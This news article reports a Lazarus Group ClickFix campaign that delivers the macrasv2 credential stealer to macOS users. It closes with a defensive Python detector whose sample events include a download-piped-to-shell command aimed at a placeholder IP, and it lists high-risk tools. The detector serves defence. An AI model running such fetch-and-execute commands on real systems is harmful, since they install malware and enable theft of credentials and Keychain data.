    North Korea’s Lazarus Targets macOS Users via ClickFix

By kirklandc008@gmail.com | April 26, 2026 | 5 Mins Read

North Korea’s Lazarus Group is using ClickFix social-engineering attacks to deliver novel macOS malware.

That’s according to security vendor Any.Run, which published research on April 21 concerning a new nation-state threat campaign. Authored by offensive security expert and Birmingham Cyber Arms founder Mauro Eldritch, the report covers a wave of ClickFix attacks on organizations, used to distribute a range of malware. Its primary focus is a newly identified macOS malware kit that is currently being used in the wild.

ClickFix is a social engineering technique that rose to prominence over the past year or so. The threat actor lures the victim to attacker-operated infrastructure, such as a website masquerading as a Zoom meeting page.

When the victim reaches the Web page, they are told there are technical issues that can only be resolved by updating their software. The attacker then instructs the victim to run malicious code, either by copying and pasting a run command (on Windows) or by downloading and opening a file that contains the code (typically on macOS).

ClickFix has lately been a favorite tactic of North Korean threat actors. Groups like Lazarus use it for initial access, with the ultimate goal of stealing cryptocurrency or intellectual property, or conducting espionage. In this latest campaign, Lazarus Group is targeting FinTech and cryptocurrency firms and high-value leaders at organizations that rely heavily on macOS devices.

    The Complete macOS Malware Attack Chain

According to Eldritch, an attacker contacts a business leader through Telegram, often from a compromised account belonging to a colleague or contact known to the target. The attacker sends the target a fake Zoom, Microsoft Teams, or Google Meet invitation to set up a conversation under the pretense of a business opportunity. North Korean actors have also used a potential job offer as a lure.

The target joins the call and is prompted to enter a command to fix connection issues. Because the user enters the command themselves, many traditional security controls are never triggered. And because users are conditioned to agree to actions like updating software, techniques like ClickFix raise fewer red flags than a traditional phishing email, especially when the attacker has used a business meeting to lower the target’s guard ahead of time.

    Then, “the operation is focused on extracting business value as quickly as possible,” the blog post read. “The attacker collects credentials, browser sessions, and system-stored secrets, including macOS Keychain data.” Such assets can then provide access to corporate systems, software-as-a-service (SaaS) platforms, and financial resources, Any.Run added.

Once the user enters the command and it connects to attacker infrastructure, the malware is downloaded as a macOS application in a .bin file with an unassuming name such as “teamsSDK.bin.” This application installs the second-stage binary and includes further trust-building touches, such as a message saying the software has been updated.

The next binary is a system profiler that connects to attacker-hosted command-and-control (C2) infrastructure. A persistence mechanism that re-invokes the malware kit at every login follows, and then the primary component, a stealer named “macrasv2,” is loaded.

The stealer gathers previously collected data, such as browser extension data, stored browser credentials and cookies, and macOS Keychain entries, consolidates it in a temporary directory, and exfiltrates it through Telegram. Macrasv2 then runs a self-deletion script, completing the infection chain.

While many North Korean state-sponsored attacks are sophisticated, Eldritch noted that macrasv2 is “badly written.” Several components are either unimplemented or incorrectly implemented, and some enter “infinite loops that may expose its presence due to system resource starvation.” The malware also leaves multiple operational security weaknesses, including exposed Telegram bot tokens and C2 endpoints with no authentication.

    How to Avoid ClickFix Compromise

Any.Run’s blog contains indicators of compromise, but it bears repeating that no matter how sophisticated an attack chain may seem, ClickFix only works if the end user runs a command or downloads a file.

As such, the best way for organizations to combat ClickFix is to educate leaders and employees on how the technique works and why it succeeds, and to make clear that they should never run suspicious commands or open files as a way to solve connectivity problems.

Aleksey Lapshin, CEO of Any.Run, tells Dark Reading that Mac users in particular should be trained out of the illusion of safety many of them hold after years of being told that “Macs don’t get malware.” Organizations should also actively track ClickFix samples in the wild and feed the actual commands back into EDR rules and execution policies. Finally, log and restrict high-risk commands on endpoints, such as curl, wget, osascript, and bash; many organizations don’t monitor these at all, Lapshin says, especially on macOS.
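The detection step Lapshin describes, turning the commands users are coaxed into typing into endpoint rules, as an added example that is not code from the article or from Any.Run. The process-exec events are constructed, and the field names and the list of interactive parent processes are assumptions; a real deployment would feed the EDR’s process telemetry into the same functions.

```python
"""Flag ClickFix-style 'fix' commands in macOS process-exec telemetry.
Added example, not code from the article or Any.Run. EVENTS is constructed
and the field names and INTERACTIVE_PARENTS list are assumptions; feed your
EDR's process-exec events in their place."""
import re
import shlex

# Tools the article singles out as high-risk to leave unlogged on macOS endpoints.
HIGH_RISK = {"curl", "wget", "osascript", "bash", "sh", "zsh"}
# ClickFix commands are typed by the user, so they arrive via a terminal or user
# shell rather than an MDM or updater agent (assumed parent names for the demo).
INTERACTIVE_PARENTS = {"Terminal", "iTerm2", "zsh", "bash"}

# Constructed sample events; a real feed would come from the EDR's exec telemetry.
EVENTS = [
    {"user": "cfo", "parent": "Terminal",
     "cmdline": "curl -fsSL http://203.0.113.10/teamsSDK.bin | bash"},
    {"user": "cfo", "parent": "Terminal",
     "cmdline": 'osascript -e \'display dialog "Zoom updated successfully"\''},
    {"user": "dev", "parent": "zsh", "cmdline": "curl -I https://example.org"},
    {"user": "_mdm", "parent": "mdmclient", "cmdline": "bash /Library/Scripts/patch.sh"},
]


def classify(event: dict) -> list[str]:
    """Return the reasons an exec event resembles a ClickFix command ([] = not flagged)."""
    cmd = event["cmdline"]
    try:
        argv = shlex.split(cmd)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        argv = cmd.split()
    tools = {a.rsplit("/", 1)[-1] for a in argv} & HIGH_RISK
    if not tools or event["parent"] not in INTERACTIVE_PARENTS:
        return []
    reasons = []
    if re.search(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b", cmd):
        reasons.append("download piped to shell")
    if re.search(r"\.bin\b", cmd):  # the .bin dropper form the report describes
        reasons.append(".bin payload fetched")
    if "osascript" in tools and "-e" in argv:  # inline AppleScript, e.g. fake 'updated' dialogs
        reasons.append("inline osascript")
    return reasons


def flagged(events: list[dict]) -> dict[str, list[str]]:
    """Map each suspicious command line to its reasons; unflagged events are dropped."""
    return {e["cmdline"]: r for e in events if (r := classify(e))}
```

The benign `curl -I` and the MDM-launched script are left alone, which is the point: the rule keys on who launched the interpreter and what it does, not on the tool name alone.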

    “Attackers always look for the cheapest entry point with the highest hit rate. Breaking through the outer moat of enterprise security, such as email gateways, EDR, perimeter filtering, gets more expensive every year, so they’re picking new paths,” Lapshin says. “And the cheapest path right now is one where the attacker is literally the user, voluntarily executing commands on their own machine.”
